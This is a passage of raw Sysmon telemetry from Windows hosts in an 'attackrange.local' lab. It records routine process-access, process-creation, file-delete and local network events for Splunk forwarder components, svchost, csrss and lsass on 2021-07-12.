L32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.099{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811ADA68445B55A80A4C55F84B4FF8E3,SHA256=F5DA81B2B7E1BC02BABF1C7295BAEC56AAB641F65B8921BEAA57B02C4B26D05D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:53.620{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45A46CB394E4DA507714F1BD0C77F8E7,SHA256=7F120626FADAAB09E9E2CD717FC0D4BC4A694B1C58E7C4769F9BB31BB2AAAFAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.884{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.853{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.888{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51048-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.888{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51048-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001049406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.614{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C0456AF753947837EC77AFA0ED46791,SHA256=E91A1A3EFFA517EC8705B78A0C98641207B017C4897030F989DB0310FD0A1FE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.878{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51047-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.878{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51047-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.857{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51046-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001049402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.856{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51046-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001049401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.414{466BC892-F511-60EB-4A7D-00000000CF01}94926996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.793{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51045-false10.0.1.12-8000- 10341000x80000000000000001049399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.233{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.067{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EB2868A4071B7F96385DD7BCA8833E,SHA256=9A7C20F895E195AB5F8EB0401EF3BD871B1B7BDE20767BCABF4508A58974CA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:54.656{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=582BF4B4240E02C088612DAF9C1E8055,SHA256=2E9EAEAA46BCDBF9EE93A22CEAAC816B76013127F2EA4B925B9C98F97243CA9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:54.867{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B29FF3EB5E8EBFCF9B9FA2436F1A551,SHA256=691495A1765D6D61F9819061DE3A05398B7830BA07C92FA132264CC9D06730DA,IMPHASH=00000000000000000000000000000000falsetrue 